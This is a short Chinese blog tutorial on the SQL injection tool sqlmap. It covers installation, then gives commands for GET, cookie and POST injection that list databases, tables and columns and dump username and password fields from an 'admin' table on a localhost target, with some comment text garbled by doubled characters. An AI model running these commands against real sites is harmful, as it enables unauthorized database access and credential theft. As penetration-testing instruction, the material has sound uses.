美文网首页python数据库
神器sqlmap的简单使用

神器sqlmap的简单使用

作者: pigdaqiang | 来源:发表于2020-01-25 20:44 被阅读0次

sqlmap

sqlmap强大的注入工具, 跨平台, 使用python编写, 可以自定义tamper脚本

安装

linux下

sudo apt-get install sqlmap # 前提是已经有python的环境变量

运行sqlmap

sqlmap -u url # 直接sqlmap就可以
或者python sqlmap -u 也可以

win

先配置好python2的环境变量, 再从官网上下载sqlmap的源码包, 将sqlmap文件夹放在python的安装路径之下. 尝试

python sqlmap.py -u # 看看是否可以正常运行

运行sqlmap

必须加python才可以

三种注入判断方式

基本get注入及返回目标基本信息

python sqlmap.py -u "url" 

获取数据库内数据:

python sqlmap.py -u url --dbs # --current-dbs 当前数据库
python sqlmap.py -u url -D 数据库名 --tables # 指定数据库内的表信息
python sqlmap.py -u url -D 数据库名 -T 表名 --columns # 数据库内表内的信息
python sqlmap.py -u url -D 数据库名 -T 表名 -C 指定的字段名 --dump 获取指定的字段内容

cookie注入

python sqlmap.py -u "url" --cookie "id=xx" --level 2

简单使用:

python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --dbs//判判断断是是否否存存在在cookie注入
python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 -D xx --tables //猜解表名
python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 -D xx -T admin --columns//猜解admin表表名名下下的的列列名名
python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --dump -C"username,password" -T admin -D xxx //获获取取指指定定列列名名admin下的数据

post注入

python sqlmap.py -u "url" --data "xx=xx&xx=xx"

基本使用同上

个人网站

相关文章

  • 神器sqlmap的简单使用

    sqlmap sqlmap强大的注入工具, 跨平台, 使用python编写, 可以自定义tamper脚本 安装 l...

  • sqlmap的简单使用

    SQLmap基于Python编写,只要安装了Python的操作系统就可以使用它。 一、SQLMap判断是否存在注入...

  • sqlmap使用

    sqlmap跑post方式的注入时,若后台对token进行验证并且token值变化,则使用简单的sqlmap -u...

  • CTF|sqlmap的简单使用

    工具 BurpSuite Chrome插件Proxy SwitchyOmega sqlmap 示例:BugKu...

  • sqlmap使用操作

    安装好sqlmap后,可以用cmd使用sqlmap D: cd sqlmap/sqlmap python sqlm...

  • sqlmapapi使用中遇到的问题

    sqlmap可谓是sql注入探测的神器,但是利用sqlmap测试SQL注入的效率很低,每一个url都需要手动测试。...

  • Sql注入之sqlmapapi介绍

    sqlmap可谓是sql注入探测的神器,但是利用sqlmap测试SQL注入的效率很低,每一个url都需要手动测试。...

  • sqlmap使用

    1. sqlmap简介 SQLmap是一款用来检测与利用SQL漏洞的注入神器。开源的自动化SQL注入工具,由Pyt...

  • SQL注入 注入工具sqlmap

    使用 下载sqlmap后,通过命令行cd到sqlmap地址下,打开sqlmap.py(python版本要在2.7以...

  • sqlmap从入门到精通-第七章-7-1 绕过WAF脚本-apo

    7.7 sqlmap使用tamper绕过WAF 7.7.1 tamper简介 1. tamper简介 sqlmap...

网友评论

    本文标题:神器sqlmap的简单使用

    本文链接:https://www.haomeiwen.com/subject/nzgrthtx.html